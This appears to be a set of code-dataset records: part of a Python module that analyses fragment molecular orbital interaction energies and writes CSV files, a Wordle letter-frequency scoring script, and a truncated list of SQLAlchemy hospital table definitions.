self.tgt1frag == [self.tgt2frag]\n for tgt1 in self.tgt1frag:\n ifdf_filter = self.gettgtdf_ffs(self. 
ifdf, tgt1, self.tgt2frag)\n self.ifdf_filters.append(\n pd.merge(ifdf_filter, self.pidf, on=['I','J'], how='left'))\n if self.pbflag is True:\n pbifdf_filter = self.gettgtdf_ffs(\n self.pbifdf, tgt1, self.tgt2frag)\n self.pbifdf_filters.append(\n pd.merge(pbifdf_filter, self.pbpidf, on=['I', 'J'], how='left'))\n print(self.ifdf_filters[0].head())\n if self.pbflag is True:\n print(self.pbifdf_filters[0].head())\n\n # mol-mol mode\n if self.anlmode == 'mol':\n # ifie\n df = self.ifdf\n# if self.selecttype == 'fragid':\n# tgtmolfrags = self.getmolfrags(self.tgt1frag[0], df)\n# print('target-frags:', molfrags)\n if self.selecttype == 'molid':\n nf = self.getlognf(self.tgtlogs, self.fragmode)\n molfragss = self.getallmolfrags(self.tgtlogs, df, nf)\n print('frags_permol\\n', molfragss)\n tgtmolfrags = []\n for tgtmolid in self.tgtmolid:\n tgtmolfrags.append(molfragss[tgtmolid-1])\n elif self.selecttype == 'molname':\n sys.exit()\n\n self.tgtmolfrags = tgtmolfrags\n print('self.tgtmolfrags:', self.tgtmolfrags)\n\n # IFIE and pieda\n ifdf_frag_mols = pd.DataFrame()\n ifdfmol_mols = pd.DataFrame(columns=['I', 'J'] + self.ifdfsumcolumn)\n ifdfmolsums = pd.DataFrame(columns=self.ifdfsumcolumn)\n\n for i in range(len(self.tgtmolfrags)):\n contactmolfrags, ifdf_frag_mol, ifdfmol_mol, ifdfmolsum = self.getifiesummol(df, tgtmolfrags[i], self.tgtmolid[i])\n\n # self.contactmolfrags = contactmolfrags\n print(ifdf_frag_mol)\n print(ifdfmol_mol)\n print(ifdfmolsum)\n\n ifdf_frag_mols = ifdf_frag_mols.append(ifdf_frag_mol)\n ifdfmol_mols = ifdfmol_mols.append(ifdfmol_mol)\n ifdfmolsums = ifdfmolsums.append(ifdfmolsum)\n\n self.ifdf_frag_mols = ifdf_frag_mols\n self.ifdfmol_mols = ifdfmol_mols\n self.ifdfmolsums = ifdfmolsums\n\n # fraginmol mode\n if self.anlmode == 'fraginmol':\n ifdf_filters = pd.DataFrame()\n ifdfsums = pd.DataFrame(columns=self.ifdfsumcolumn)\n\n df = self.ifdf\n tgt1_lofrag = self.tgt1_lofrag\n tgt2_lofrag = self.tgt2_lofrag\n tgt2molname = self.tgt2molname\n nf = self.getlognf(self.tgtlogs, self.fragmode)\n print('nf', nf)\n molfragss = self.getallmolfrags(self.tgtlogs, df, nf)\n print('molfragss', molfragss)\n print('len_molfragss', len(molfragss))\n print('resnames', self.resnames)\n print('self.resnames', len(self.resnames))\n\n print('resnames_perfrag', self.resnamenonum_perfrag)\n print('len self.resnames', len(self.resnamenonum_perfrag))\n\n rname_perfrag = self.resnamenonum_perfrag\n\n tgtmolfrags = []\n\n rname_permol = copy.deepcopy(molfragss)\n for j in range(len(rname_permol)):\n # if type(molfragss[j]) == list:\n for k in range(len(molfragss[j])):\n num = copy.deepcopy(molfragss[j][k]) - 1\n rname_permol[j][k] = rname_perfrag[num]\n\n tgt2_glofrags = []\n # print('resnames', self.resnames)\n for i in range(len(rname_permol)):\n if tgt2molname in rname_permol[i]:\n # print(self.resnames[i], tgt2molname)\n tgt2frag = molfragss[i][tgt2_lofrag - 1]\n tgt2_glofrags.append(tgt2frag)\n print('tgt2_glofrags', tgt2_glofrags)\n\n # tgtmol loop\n for tgtmol in self.tgtmolid:\n tgtmol = tgtmol - 1\n\n tgt1_glofrag = molfragss[tgtmol][tgt1_lofrag - 1]\n print('tgt1glofrag', tgt1_glofrag)\n print('centermolfrag:', tgt1_glofrag)\n print('tgt2molname', tgt2molname)\n tgtdf = df[df['I'] == tgt1_glofrag]\n tgtdf = tgtdf.append(df[df['J'] == tgt1_glofrag])\n tgtdf = tgtdf[tgtdf['DIST'] < self.dist]\n tgtdf = tgtdf[tgtdf['DIST'] != 0.0]\n\n # ifdf_filters = pd.DataFrame()\n tgtdf_filter = tgtdf[(tgtdf['I'].isin(tgt2_glofrags)) | (tgtdf['J'].isin(tgt2_glofrags))]\n # print('ifdf_filters\\n', 
tgtdf_filter)\n\n # PIEDA\n ifdf_filter = pd.merge(tgtdf_filter, self.pidf, on=['I', 'J'], how='left')\n ifdf_filters = ifdf_filters.append(ifdf_filter)\n\n # print(ifdf_filter)\n HF_IFIE_sum, MP2_IFIE_sum, PR_TYPE1_sum, GRIMME_sum, \\\n JUNG_sum, HILL_sum, ES_sum, EX_sum, CT_sum, DI_sum, \\\n q_sum = self.getsumdf(ifdf_filter)\n\n ifdfsum = pd.Series([HF_IFIE_sum, MP2_IFIE_sum, PR_TYPE1_sum,\n GRIMME_sum, JUNG_sum, HILL_sum, ES_sum,\n EX_sum, CT_sum, DI_sum, q_sum],\n index=self.ifdfsumcolumn, name='mol' + str(tgtmol+1))\n ifdfsums = ifdfsums.append(ifdfsum)\n\n # self.tgt1_glofrag = tgt1_glofrags\n # self.tgt2_glofrags = tgt2_glofrags\n self.ifdf_filters = ifdf_filters\n self.ifdfsums = ifdfsums\n\n return self\n\n def writecsvwrap(self, head=None, word='', pbwrite=False):\n '''writecsvwrap\n\n writecsv section\n\n Args:\n head (str): head of csv file name\n word (str): word of csv file name\n pbwrite (bool): write csv file or not\n\n Returns:\n self (object)\n '''\n\n print('## Write Section')\n path = 'csv'\n tgt2type = self.tgt2type\n if os.path.exists('csv') is False:\n os.mkdir('csv')\n\n if self.anlmode == 'frag':\n if head is None:\n head = os.path.splitext(self.tgtlogs)[0].split('/')[-1]\n\n if self.matrixtype == 'frags-frags':\n if self.logMethod == 'MP2':\n datadfs = [\n self.esdf,\n self.exdf,\n self.ctdf,\n self.hfdf,\n self.mp2corrdf,\n self.prmp2corrdf,\n self.mp2tdf,\n self.prmp2tdf,\n self.distdf\n ]\n names = [\n 'ES',\n 'EX',\n 'CT',\n 'HF',\n 'MP2corr',\n 'PRMP2corr',\n 'MP2total',\n 'PRMP2total',\n 'Distance'\n ]\n elif self.logMethod == 'MP3':\n datadfs = [\n self.esdf,\n self.exdf,\n self.ctdf,\n self.hfdf,\n self.mp2corrdf,\n self.mp3corrdf,\n self.mp25corrdf,\n self.usermp3corrdf,\n self.mp2tdf,\n self.mp3tdf,\n self.mp25tdf,\n self.usermp3tdf,\n self.distdf\n ]\n names = [\n 'ES',\n 'EX',\n 'CT',\n 'HF',\n 'MP2corr',\n 'MP3corr',\n 'MP25corr',\n 'USER-MP3corr',\n 'MP2total',\n 'MP3total',\n 'MP25total',\n 'USER-MP3total',\n 'Distance'\n ]\n elif self.logMethod == 'CCPT':\n datadfs = [\n self.esdf,\n self.exdf,\n self.ctdf,\n self.hfdf,\n self.mp2corrdf,\n self.mp3corrdf,\n self.mp4corrdf,\n self.mp25corrdf,\n self.mp35corrdf,\n self.mp2tdf,\n self.mp3tdf,\n self.mp4tdf,\n self.mp25tdf,\n self.mp35tdf,\n self.distdf\n ]\n names = [\n 'ES',\n 'EX',\n 'CT',\n 'HF',\n 'MP2corr',\n 'MP3corr',\n 'MP4corr',\n 'MP25corr',\n 'MP35corr',\n 'MP2total',\n 'MP3total',\n 'MP4total',\n 'MP25total',\n 'MP35total',\n 'Distance'\n ]\n if self.logMethod == 'HF':\n datadfs = [\n self.esdf,\n self.exdf,\n self.ctdf,\n self.hfdf,\n self.distdf\n ]\n names = [\n 'ES',\n 'EX',\n 'CT',\n 'HF',\n 'Distance'\n ]\n if self.logMethod == 'HF+D':\n datadfs = [\n self.esdf,\n self.exdf,\n self.ctdf,\n self.hfdf,\n self.mp2corrdf,\n self.mp2tdf,\n self.distdf\n ]\n names = [\n 'ES',\n 'EX',\n 'CT',\n 'HF',\n 'DILRDcorr',\n 'LRDtotal',\n 'Distance'\n ]\n\n tgt1str = str(self.tgt1frag[0]) + '-' + str(self.tgt1frag[-1])\n tgt2str = str(self.tgt2frag[0]) + '-' + str(self.tgt2frag[-1])\n for i in range(len(datadfs)):\n # rename index-columns\n if self.addresinfo:\n datadfs[i].rename(index=lambda x: self.resname_perfrag[int(x)-1] + '(' + str(x) + ')',\n columns=lambda x: self.resname_perfrag[int(x)-1] + '(' + str(x) + ')', inplace=True)\n\n ocsv = head + '_frag' + str(tgt1str) + '-frag' + str(tgt2str) + '-' + word + names[i] + '-ffmatrix.csv'\n datadfs[i].T.to_csv(path + '/' + ocsv)\n print(path + '/' + ocsv + ' was created.')\n\n if pbwrite:\n if self.addresinfo:\n self.solvesdf.rename(index=lambda 
x: self.resname_perfrag[int(x)-1] + '(' + str(x) + ')',\n columns=lambda x: self.resname_perfrag[int(x)-1] + '(' + str(x) + ')', inplace=True)\n\n ocsv = head + '_frag' + str(tgt1str) + '-frag' + str(tgt2str) + '-' + word + 'SolvES-ffmatrix.csv'\n self.solvesdf.T.to_csv(path + '/' + ocsv)\n print(path + '/' + ocsv + ' was created.')\n\n else:\n if self.tgt2type in ['dist', 'dimer-es']:\n tgtid = self.tgt1frag[0]\n try:\n ohead = head + '-' + str(tgtid) + '-' + frags[tgtid - 1]\n except:\n ohead = head + '-' + str(tgtid)\n\n if self.tgt2type == 'dist':\n oifie = ohead + '-ifie_' + 'dist' + str(self.dist) + '.csv'\n else:\n oifie = ohead + '-ifie_dimer-es-false.csv'\n\n\n if self.addresinfo:\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n self.ifdf_filter.I = self.ifdf_filter.I.replace(val1, val2)\n self.ifdf_filter.J = self.ifdf_filter.J.replace(val1, val2)\n\n print(self.ifdf_filter.I)\n\n self.ifdf_filter.to_csv(path + '/' + oifie)\n print(path + '/' + oifie, 'was generated.')\n\n if self.pbflag:\n try:\n ohead = head + '-' + str(tgtid) + '-' + frags[tgtid - 1]\n except:\n ohead = head + '-' + str(tgtid)\n\n if self.tgt2type == 'dist':\n oifie = ohead + '-pbifie_' + 'dist' + str(self.dist) + '.csv'\n else:\n oifie = ohead + '-pbifie_dimer-es-false.csv'\n\n if self.addresinfo:\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n self.pbifdf_filter.I = self.pbifdf_filter.I.replace(val1, val2)\n self.pbifdf_filter.J = self.pbifdf_filter.J.replace(val1, val2)\n\n print(self.pbifdf_filter.I)\n\n self.pbifdf_filter.to_csv(path + '/' + oifie)\n\n print(path + '/' + oifie, 'was generated.')\n\n elif self.tgt2type == 'frag':\n\n tgt1s = self.tgt1frag\n count = 0\n for tgt1 in tgt1s:\n ohead = head + '-frag' + str(tgt1) + '-frag' + str(self.tgt2frag[0]) + '-' + str(self.tgt2frag[-1])\n oifie = ohead + '-ifie.csv'\n\n ifdf_filter = self.ifdf_filters[count]\n\n if self.addresinfo:\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n ifdf_filter.I = ifdf_filter.I.replace(val1, val2)\n ifdf_filter.J = ifdf_filter.J.replace(val1, val2)\n\n ifdf_filter.to_csv(path + '/' + oifie)\n print(path + '/' + oifie, 'was generated.')\n count += 1\n # N:1 sheet\n for j in range(len(self.ifdf_filters)):\n if j == 0:\n ifdf_fil_n1 = self.ifdf_filters[j].fillna(0.0)\n # pidf_fil_n1 = self.pidf_filters[j]\n else:\n ifdf_fil_n1 += self.ifdf_filters[j].fillna(0.0).values\n\n print(self.ifdf_filters[j])\n # pidf_fil_n1 += self.pidf_filters[j].values\n\n ohead = head + '-frag' + str(self.tgt1frag[0]) + '-' + str(self.tgt1frag[-1]) + '-frag' + str(self.tgt2frag[0]) + '-' + str(self.tgt2frag[-1]) + 'n-1sum'\n oifie = ohead + '-ifie.csv'\n\n ifdf_fil_n1 = ifdf_fil_n1.reset_index(drop=True)\n\n if self.addresinfo:\n ifdf_fil_n1[\"I\"] = self.resname_perfrag[int(self.tgt1frag[0])-1] + '(' + str(self.tgt1frag[0]) + ')' + '-' + \\\n self.resname_perfrag[int(self.tgt1frag[-1])-1] + '(' + str(self.tgt1frag[-1]) + ')'\n ifdf_fil_n1[\"J\"] = self.tgt2frag\n\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n ifdf_fil_n1.J = ifdf_fil_n1.J.replace(val1, val2)\n else:\n # print(self.tgt1frag)\n ifdf_fil_n1[\"I\"] = str(self.tgt1frag[0]) + '-' + str(self.tgt1frag[-1])\n ifdf_fil_n1[\"J\"] = self.tgt2frag\n\n del ifdf_fil_n1['DIMER-ES']\n del 
ifdf_fil_n1['DIST']\n\n ifdf_fil_n1.to_csv(path + '/' + oifie)\n\n print(path + '/' + oifie, 'was generated.')\n\n # pb\n if self.pbflag:\n count = 0\n for tgt1 in tgt1s:\n ohead = head + '-frag' + str(tgt1) + '-frag' + str(self.tgt2frag[0]) + '-' + str(self.tgt2frag[-1])\n oifie = ohead + '-pbifie.csv'\n\n pbifdf_filter = self.pbifdf_filters[count]\n\n if self.addresinfo:\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n pbifdf_filter.I = pbifdf_filter.I.replace(val1, val2)\n pbifdf_filter.J = pbifdf_filter.J.replace(val1, val2)\n\n pbifdf_filter.to_csv(path + '/' + oifie)\n print(path + '/' + oifie, 'was generated.')\n count += 1\n\n # N:1 sheet\n for j in range(len(self.pbifdf_filters)):\n if j == 0:\n pbifdf_fil_n1 = self.pbifdf_filters[j]\n # pidf_fil_n1 = self.pidf_filters[j]\n else:\n pbifdf_fil_n1 += self.pbifdf_filters[j].values\n # pidf_fil_n1 += self.pidf_filters[j].values\n\n ohead = head + '-frag' + str(self.tgt1frag[0]) + '-' + str(self.tgt1frag[-1]) + '-frag' + str(self.tgt2frag[0]) + '-' + str(self.tgt2frag[-1]) + 'n-1sum'\n oifie = ohead + '-ifie.csv'\n\n pbifdf_fil_n1 = pbifdf_fil_n1.reset_index(drop=True)\n\n if self.addresinfo:\n pbifdf_fil_n1[\"I\"] = self.resname_perfrag[int(self.tgt1frag[0])-1] + '(' + str(self.tgt1frag[0]) + ')' + '-' + \\\n self.resname_perfrag[int(self.tgt1frag[-1])-1] + '(' + str(self.tgt1frag[-1]) + ')'\n pbifdf_fil_n1[\"J\"] = self.tgt2frag\n\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n pbifdf_fil_n1.J = pbifdf_fil_n1.J.replace(val1, val2)\n else:\n pbifdf_fil_n1[\"I\"] = self.tgt1frag[0] + '-' + self.tgt1frag[-1]\n pbifdf_fil_n1[\"J\"] = self.tgt2frag\n\n del pbifdf_fil_n1['DIMER-ES']\n del pbifdf_fil_n1['DIST']\n\n pbifdf_fil_n1.to_csv(path + '/' + oifie)\n\n print(path + '/' + oifie, 'was generated.')\n\n if self.anlmode == 'multi':\n head = self.ilog_head.split('/')[-1]\n if tgt2type == 'frag':\n\n if self.matrixtype == 'times-frags':\n\n if self.is_disp:\n datadfs = [\n self.esdfs,\n self.exdfs,\n self.ctdfs,\n self.hfdfs,\n self.mp2corrdfs,\n self.prmp2corrdfs,\n self.mp2tdfs,\n self.prmp2tdfs,\n self.distdfs,\n self.didfs,\n self.erestdfs\n ]\n names = [\n 'ES',\n 'EX',\n 'CT',\n 'HF',\n 'MP2corr',\n 'PRMP2corr',\n 'MP2total',\n 'PRMP2total',\n 'distance',\n 'LRD',\n 'PRMP2Erest',\n ]\n else:\n datadfs = [\n self.esdfs,\n self.exdfs,\n self.ctdfs,\n self.hfdfs,\n self.mp2corrdfs,\n self.prmp2corrdfs,\n self.mp2tdfs,\n self.prmp2tdfs,\n self.distdfs\n ]\n names = [\n 'ES',\n 'EX',\n 'CT',\n 'HF',\n 'MP2corr',\n 'PRMP2corr',\n 'MP2total',\n 'PRMP2total',\n 'distance',\n ]\n\n tgt2str = str(self.tgt2frag[0]) + '-' + str(self.tgt2frag[-1])\n if self.depth(self.tgt2frag) >= 2:\n tgt2str = str(self.tgt2frag[0][0]) + '-end'\n\n print('--- out files ---')\n # i:type, j:tgt1frag\n for i in range(len(datadfs)):\n sum2df = pd.DataFrame(index=datadfs[i][0].columns)\n for j in range(len(datadfs[i])):\n tgt1frag = self.tgt1frag[j]\n ocsv = head + '_frag' + str(tgt1frag) + '-frag' + str(tgt2str) + '-' + names[i] + '-tfmatrix.csv'\n if self.addresinfo:\n datadfs[i][j].rename(index = lambda x: self.resname_perfrag[int(x)-1] + '(' + str(x) + ')', inplace=True)\n datadfs[i][j].T.to_csv(path + '/' + ocsv)\n print(path + '/' + ocsv)\n\n # gen tgtfrag1 sum matrix\n if j == 0:\n sum1df = datadfs[i][j]\n else:\n sum1df = sum1df + datadfs[i][j]\n\n # gen tgtfrag2 sum matrix\n sum2dfbuf = datadfs[i][j].sum()\n 
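# note: DataFrame.sum() totals each column of this matrix, one value per\n                        # column label; sum1df accumulates the element-wise sum across the tgt1\n                        # fragments, while sum2df collects these per-fragment column totals.\n                        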
sum2dfbuf.name = tgt1frag\n sum2df = pd.concat([sum2df, sum2dfbuf], axis=1)\n\n osum1csv = head + '_frag' + str(self.tgt1frag[0]) + '-' + str(self.tgt1frag[-1]) + '-frag' + str(tgt2str) + '-' + names[i] + '-sumtfmatrix.csv'\n sum1df.T.to_csv(path + '/' + osum1csv)\n print(path + '/' + osum1csv)\n\n osum2csv = head + '_frag' + str(self.tgt1frag[0]) + '-' + str(self.tgt1frag[-1]) + '-frag' + str(tgt2str) + '-' + names[i] + '-sum2matrix.csv'\n sum2df.to_csv(path + '/' + osum2csv)\n print(path + '/' + osum2csv)\n\n else:\n tgt1frag = self.tgt1frag[0]\n tgt2frag = self.tgt2frag[0]\n\n if self.addresinfo:\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n self.ifdf_filters.I = self.ifdf_filters.I.replace(val1, val2)\n self.ifdf_filters.J = self.ifdf_filters.J.replace(val1, val2)\n\n oifie = 'frag' + str(tgt1frag) + '-frag' + str(tgt2frag) + '-ifie.csv'\n self.ifdf_filters.to_csv(path + '/' + oifie)\n print(path + '/' + oifie, 'was created.')\n\n if tgt2type in ['dist', 'dimer-es']:\n\n tgt1frag = self.tgt1frag[0]\n\n if tgt2type == 'molname':\n tgt2molname = self.tgt2molname\n oifie = 'frag' + str(tgt1frag) + '-' + str(tgt2molname) + '-dist' + str(self.dist) + '-ifiesum.csv'\n oifiedt = 'frag' + str(tgt1frag) + '-' + str(tgt2molname) + '-dist' + str(self.dist) + '-ifiedt.csv'\n\n if tgt2type == 'dist':\n tgt2dist = self.dist\n oifie = 'frag' + str(tgt1frag) + '-dist' + str(tgt2dist) + '-ifiesum.csv'\n oifiedt = 'frag' + str(tgt1frag) + '-dist' + str(tgt2dist) + '-ifiedt.csv'\n\n if tgt2type == 'dimer-es':\n oifie = 'frag' + str(tgt1frag) + '-dimer-es-false-ifiesum.csv'\n oifiedt = 'frag' + str(tgt1frag) + '-dimer-es-false-ifiedt.csv'\n\n if self.addresinfo:\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n self.ifdf_filters.I = self.ifdf_filters.I.replace(val1, val2)\n self.ifdf_filters.J = self.ifdf_filters.J.replace(val1, val2)\n\n self.ifdfsum.to_csv(path + '/' + oifie)\n self.ifdf_filters.to_csv(path + '/' + oifiedt)\n\n print(path + '/' + oifie)\n print(path + '/' + oifiedt, 'was created.')\n\n if tgt2type in ['molname']:\n\n for j in range(len(self.tgt1frag)):\n tgt1frag = self.tgt1frag[j]\n\n if tgt2type == 'molname':\n tgt2molname = self.tgt2molname\n oifie = 'frag' + str(tgt1frag) + '-' + \\\n str(tgt2molname) + '-dist' + \\\n str(self.dist) + '-ifiesum.csv'\n oifiedt = 'frag' + str(tgt1frag) + \\\n '-' + str(tgt2molname) + '-dist' + \\\n str(self.dist) + '-ifiedt.csv'\n\n if self.addresinfo:\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + \\\n str(val1) + ')'\n self.ifdf_filters[j].I = \\\n self.ifdf_filters[j].I.replace(val1, val2)\n self.ifdf_filters[j].J = \\\n self.ifdf_filters[j].J.replace(val1, val2)\n\n self.ifdfsum[j].to_csv(path + '/' + oifie)\n self.ifdf_filters[j].to_csv(path + '/' + oifiedt)\n\n print(path + '/' + oifie)\n print(path + '/' + oifiedt, 'was created.')\n\n if self.anlmode == 'mol':\n if head is None:\n head = os.path.splitext(self.tgtlogs)[0].split('/')[-1]\n\n dist = self.dist\n selecttype = self.selecttype\n # piedamol_mol = self.piedamol_mol\n ifdf_frag_mols = self.ifdf_frag_mols\n ifdfmol_mols = self.ifdfmol_mols\n\n # pieda_frag_mols = self.pieda_frag_mols\n if selecttype == 'molid':\n tgtid = self.tgtmolid\n else:\n tgtid = self.tgt1frag[0]\n\n idstr = str(tgtid[0]) + '-' + str(tgtid[-1])\n ilogdtname = path + '/' + head + '_ifie-fragmol-' + selecttype + \\\n 
idstr + 'dist' + str(dist) + '.csv'\n imolname = path + '/' + head + '_ifiemol-mol-' + selecttype + \\\n idstr + 'dist' + str(dist) + '.csv'\n isumname = path + '/' + head + '_ifiesummol-mol-' + selecttype + \\\n idstr + 'dist' + str(dist) + '.csv'\n\n# ifdf_frag_molsdt = pd.DataFrame()\n# pd.set_option('display.width', 500)\n# for ifdf_frag_mol in ifdf_frag_mols:\n# ifdf_frag_molsdt = ifdf_frag_molsdt.append(ifdf_frag_mol)\n\n if self.addresinfo:\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n ifdf_frag_mols.I = ifdf_frag_mols.I.replace(val1, val2)\n ifdf_frag_mols.J = ifdf_frag_mols.J.replace(val1, val2)\n\n # print(ifdf_frag_molsdt, file=ilogdt)\n ifdf_frag_mols.to_csv(ilogdtname)\n ifdfmol_mols.to_csv(imolname)\n self.ifdfmolsums.to_csv(isumname)\n\n print('---out---')\n print(ilogdtname)\n print(imolname)\n print(isumname)\n\n if self.anlmode == 'fraginmol':\n if head is None:\n head = os.path.splitext(self.tgtlogs)[0].split('/')[-1]\n\n ohead = head + '-' 'tgt1frag' + str(self.tgt1_lofrag) + '-mol' + \\\n str(self.tgt2molname) + 'frag' + str(self.tgt2_lofrag)\n\n if self.addresinfo is True:\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n self.ifdf_filters.I = \\\n self.ifdf_filters.I.replace(val1, val2)\n self.ifdf_filters.J = \\\n self.ifdf_filters.J.replace(val1, val2)\n # self.ifdf.I = self.ifdf.I.replace(val1, val2)\n # self.ifdf.J = self.ifdf.J.replace(val1, val2)\n\n # self.ifdf.to_csv(path + '/' + head + '-ifie.csv')\n oifie = path + '/' + ohead + '-ifie_' + 'dist' + \\\n str(self.dist) + '.csv'\n oifiesum = path + '/' + ohead + '-ifiesum_' + 'dist' + \\\n str(self.dist) + '.csv'\n self.ifdf_filters.to_csv(oifie)\n self.ifdfsums.to_csv(oifiesum)\n print(oifie, 'was generated.')\n print(oifiesum, 'was generated.')\n","repo_name":"kojioku/abmptools","sub_path":"abmptools/anlfmo.py","file_name":"anlfmo.py","file_ext":"py","file_size_in_byte":129991,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"27167588144","text":"import inflect\nfrom nltk.corpus import wordnet\nimport string\n\ndef score_word_by_result_table(word, result_table):\n alpha_count_tracker = dict.fromkeys(string.ascii_lowercase, 0)\n score = 0\n for i in range(0, len(word)):\n score = score + result_table[alpha_count_tracker[word[i].lower()]][word[i].lower()]\n alpha_count_tracker[word[i].lower()] = alpha_count_tracker[word[i].lower()] + 1\n return (score)\n\ndef rank_result_set(words_result_set, method=\"high\"):\n if method == \"low\":\n return ({key: rank for rank, key in enumerate(sorted(words_result_set, key=words_result_set.get), 1)})\n else:\n return (\n {key: rank for rank, key in enumerate(sorted(words_result_set, key=words_result_set.get, reverse=True), 1)})\n\ndef top_result(words_result_set, method=\"high\"):\n return(next(iter(rank_result_set(words_result_set=words_result_set, method=method))))\n\ndef tally_to_prob(tally_table):\n total_letters = 0\n for result in tally_table:\n total_letters = total_letters + sum(result.values())\n\n for i in range(0, 5):\n for k in tally_table[i].keys():\n tally_table[i][k] = tally_table[i][k] / total_letters\n\n return (tally_table)\n\ndef is_noun(word):\n syns = wordnet.synsets(word)\n if syns[0].lexname().split('.')[0] if syns else None == \"noun\":\n return(True)\n else:\n return(False)\n\ndef is_plural(word):\n inf = inflect.engine()\n 
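# inflect's singular_noun() returns the singular form (truthy) for a\n    # plural noun and False otherwise (e.g. 'geese' -> 'goose', 'goose' ->\n    # False), so returning it doubles as a plural test.\n    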
return(inf.singular_noun(word))\n\nclass Analyzer:\n def __init__(self, words):\n self.words = words\n\n def score_word(self, word, json):\n frequency_perc = json[\"frequency_perc\"] if \"frequency_perc\" in json.keys() else 1\n position_perc = json[\"position_perc\"] if \"position_perc\" in json.keys() else 0\n nonnoun_perc = json[\"nonnoun_perc\"] if \"nonnoun_perc\" in json.keys() else 1\n plural_perc = json[\"plural_perc\"] if \"plural_perc\" in json.keys() else 1\n\n nonnoun_mult = nonnoun_perc if not is_noun(word) else 1\n plural_mult = plural_perc if is_plural(word) else 1\n\n results = (score_word_by_result_table(word=word,\n result_table=tally_to_prob(self.letter_tally_by_frequency())) * frequency_perc + score_word_by_result_table(word=word,\n result_table=tally_to_prob(self.letter_tally_by_position())) * position_perc) * nonnoun_mult * plural_mult\n return(results)\n\n def score_words(self, words, json):\n results = {}\n for word in words:\n results[word] = self.score_word(word=word, json=json)\n return(results)\n\n def letter_tally_by_position(self):\n letters = []\n for i in range(0, 5):\n alpha = dict.fromkeys(string.ascii_lowercase, 0)\n for word in self.words:\n alpha[word[i].lower()] = alpha[word[i].lower()] + 1\n letters.append(alpha)\n return (letters)\n\n def letter_tally_by_frequency(self):\n letter_tally = []\n\n for i in range(0, 5):\n letter_tally.append(dict.fromkeys(string.ascii_lowercase, 0))\n\n for word in self.words:\n alpha_count_tracker = dict.fromkeys(string.ascii_lowercase, 0)\n for i in range(0, len(word)):\n letter_tally[alpha_count_tracker[word[i].lower()]][word[i].lower()] = \\\n letter_tally[alpha_count_tracker[word[i].lower()]][word[i].lower()] + 1\n alpha_count_tracker[word[i].lower()] = alpha_count_tracker[word[i].lower()] + 1\n\n return (letter_tally)","repo_name":"cjordan-personal/wordle_analysis","sub_path":"analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":3553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22511106685","text":"from sqlalchemy import Column, String, Integer, DateTime, BigInteger\nfrom sqlalchemy.dialects.postgresql import ARRAY, JSON\n\nfcrb_table_definitions = {\n \"fcrb.serums_ids\": {\n \"id\": Column(\"id\", BigInteger, primary_key=True),\n \"serums_id\": Column(\"serums_id\", Integer),\n \"patnr\": Column(\"patnr\", BigInteger)\n },\n \"fcrb.hospital_doctors\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"serums_id\": Column(\"serums_id\", Integer),\n \"staff_id\": Column(\"staff_id\", Integer),\n \"name\": Column(\"name\", String),\n \"department_id\": Column(\"department_id\", Integer),\n \"department_name\": Column(\"department_name\", String)\n },\n \"fcrb.tags\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"tags\": Column(\"tags\", ARRAY(String))\n },\n \"fcrb.translated_tags\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"tags\": Column(\"tags\", JSON)\n },\n \"fcrb.diagnostic\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"einri\": Column(\"einri\", String(4)),\n \"patnr\": Column(\"patnr\", BigInteger),\n \"falnr\": Column(\"falnr\", String(10)),\n \"pernr\": Column(\"pernr\", String(12)),\n \"lfdnr\": Column(\"lfdnr\", String(3)),\n \"dkey1\": Column(\"dkey1\", String(30))\n },\n \"fcrb.episode\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"falnr\": Column(\"falnr\", String(10)),\n \"pernr\": Column(\"pernr\", String(12)),\n \"einri\": Column(\"einri\", 
String(4)),\n \"falar\": Column(\"falar\", String(1)),\n \"patnr\": Column(\"patnr\", BigInteger),\n \"bekat\": Column(\"bekat\", String(40)),\n \"einzg\": Column(\"einzg\", String(9)),\n \"statu\": Column(\"statu\", String(1)),\n \"krzan\": Column(\"krzan\", String(1)),\n \"enddt\": Column(\"enddt\", DateTime(timezone=False)),\n \"erdat\": Column(\"erdat\", DateTime(timezone=False)),\n \"storn\": Column(\"storn\", String(1)),\n \"begdt\": Column(\"begdt\", DateTime(timezone=False)),\n \"casetx\": Column(\"casetx\", String(20)),\n \"fatxt\": Column(\"fatxt\", String(40)),\n \"enddtx\": Column(\"enddtx\", String(20))\n },\n \"fcrb.medical_specialty\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"orgid\": Column(\"orgid\", String(8)),\n \"orgna\": Column(\"orgna\", String(40))\n },\n \"fcrb.medication\": {\n \"id\": Column(\"id\", Integer, primary_key=True),\n \"einri\": Column(\"einri\", String(4)),\n \"patnr\": Column(\"patnr\", BigInteger),\n \"falnr\": Column(\"falnr\", String(10)),\n \"motx\": Column(\"motx\", 